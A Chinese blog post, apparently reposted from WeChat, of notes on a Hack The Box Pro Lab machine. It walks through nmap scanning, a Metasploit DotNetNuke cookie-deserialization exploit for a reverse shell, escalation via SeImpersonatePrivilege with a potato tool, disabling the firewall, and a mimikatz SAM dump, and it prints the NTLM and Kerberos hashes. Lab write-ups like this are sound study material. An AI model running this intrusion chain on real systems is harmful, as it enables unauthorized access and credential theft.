HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

2024年2月9日00:57:13评论36 views字数 1934阅读6分26秒阅读模式

扫描网段主机

nmap 10.10.110.0/24

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

从上面看该网段是4个主机，先看第一个10.10.110.10主机，进入网页

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

从里面分析，文字里面写了DNN® Platform，叫DotNetNuke，是一个开源的内容管理系统（CMS），用于构建网站和网上应用程序，先在exploitdb里面找一下exploit

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

看到有个exp是在美少妇有模块，进入美少妇问问，直接在美少妇搜索DotNetNuke

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

选择该模块，输入info命令得知漏洞是一种反序列化漏洞，它影响DotNetNuke（DNN）版本5.0.0至9.3.0-RC。DNN个人化信息存储在DNNPersonalization cookie中，并以XML格式存在

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

设置exp的参数，其中token跟IV参数是在网页的后台，设置443端口

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

成功反弹shell，输入getuid命令得到当下的用户是NT AUTHORITYNETWORK SERVICE，尝试直接getsystem命令，获得admin权限

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

看来被限制了，进入shell，输入whoami /priv查看提权信息

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

发现了SeImpersonatePrivilege是开着的，老配方，使用土豆.exe

god.exe -cmd "cmd /c whoami"

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

成功反弹shell，拿到nt authoritysystem，经过搜寻，在C:DotNetNuke底下可以拿到一个flag，Administrator桌面没有

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

先关闭防火墙，有杀毒，然后上传mimikatz，获得hsah

SAM

lsadump::sammimikatz # Domain : CYWEBDWSysKey : 6f9ec047e0cc2be91f5463aeb3189568Local SID : S-1-5-21-974100046-684349727-4186098362SAMKey : 7f23249058837880f70a9947d9f377f3RID  : 000001f4 (500)User : Administrator  Hash NTLM: 7574cbf9d92c39d1d4dccd7b89301d2fSupplemental Credentials:* Primary:NTLM-Strong-NTOWF *    Random Value : dc982f326b5017e646efe1d5760d0f04* Primary:Kerberos-Newer-Keys *    Default Salt : ADMINIS-GL281LHAdministrator    Default Iterations : 4096    Credentials      aes256_hmac       (4096) : f3cd0f0ed222e7378931e8287386b53196631392024548d639d6b76b4ab9d761      aes128_hmac       (4096) : 109316d3a8ea62d8e654d8534d3c8622      des_cbc_md5       (4096) : 432aa25eec1f97c1    OldCredentials      aes256_hmac       (4096) : 407f19837353860d58c535aacd8d005f4fdb6b96b62f8322165fecb3c3079806      aes128_hmac       (4096) : 068f6fcf2fc64585b19a05b9422367cc      des_cbc_md5       (4096) : 8fba4cb6166e2f8c    OlderCredentials      aes256_hmac       (4096) : 2e9115dfd756f72a5fef3bdd1ba213a17448e410462081721cdef0cfde4beb16      aes128_hmac       (4096) : 422895ede582fe5680cf2f16927596a8      des_cbc_md5       (4096) : 647a01f8626bbf9d* Packages *    NTLM-Strong-NTOWF* Primary:Kerberos *    Default Salt : ADMINIS-GL281LHAdministrator    Credentials      des_cbc_md5       : 432aa25eec1f97c1    OldCredentials      des_cbc_md5       : 8fba4cb6166e2f8cRID  : 000001f5 (501)User : GuestRID  : 000001f7 (503)User : DefaultAccountRID  : 000001f8 (504)User : WDAGUtilityAccount

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

原文始发于微信公众号（Jiyou too beautiful）：HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

左青龙
微信扫一扫

右白虎
微信扫一扫

HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13

记一次有源码的渗透测试

经典：“红日三”服务器群靶机

Google如何利用生成式AI加速事件响应流程

Hack The Box-start point-Archetype笔记

使用 Burp 枚举 REST API

fastjson-BCEL不出网打法原理分析

改变content-type类型所触发的csrf

【OSCP】vivifytech

从零开始的Kubernetes攻防

一次js混淆测试记录

发表评论

在线咨询

微信